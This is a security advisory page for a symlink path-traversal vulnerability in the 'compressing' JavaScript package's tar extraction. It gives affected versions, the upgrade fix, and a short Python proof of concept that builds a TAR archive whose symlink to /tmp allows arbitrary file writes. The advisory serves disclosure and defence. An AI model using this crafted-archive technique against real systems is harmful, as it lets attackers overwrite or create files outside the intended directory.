Symlink Attack Affecting compressing package, versions <1.10.4>=2.0.0 <2.0.1


Severity

Recommended
0.0
high
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.02% (3rd percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-JS-COMPRESSING-15202444
  • published4 Feb 2026
  • disclosed3 Feb 2026
  • creditYuzhou He

Introduced: 3 Feb 2026

NewCVE-2026-24884  (opens in a new tab)
CWE-59  (opens in a new tab)

How to fix?

Upgrade compressing to version 1.10.4, 2.0.1 or higher.

Overview

compressing is an Everything you need for compressing and uncompressing

Affected versions of this package are vulnerable to Symlink Attack via the `compressing.tar.uncompress' function, which sanitizes the destination paths of archive entries. An attacker can overwrite or create files in arbitrary locations on the host file system by supplying a crafted TAR archive containing symbolic links that resolve outside the intended extraction directory.

PoC

base_dir = "archive/"
with tarfile.open("./poc_arbitrary_write.tar", mode="w") as tar:
    add_regular_file(tar, base_dir + "baseFile.txt", "base content\n")
    add_symlink(tar, base_dir + "myTmp", "/tmp")
    add_regular_file(tar, base_dir + "myTmp/poc.txt", "Arbitrary File Write\n")

CVSS Base Scores

version 4.0
version 3.1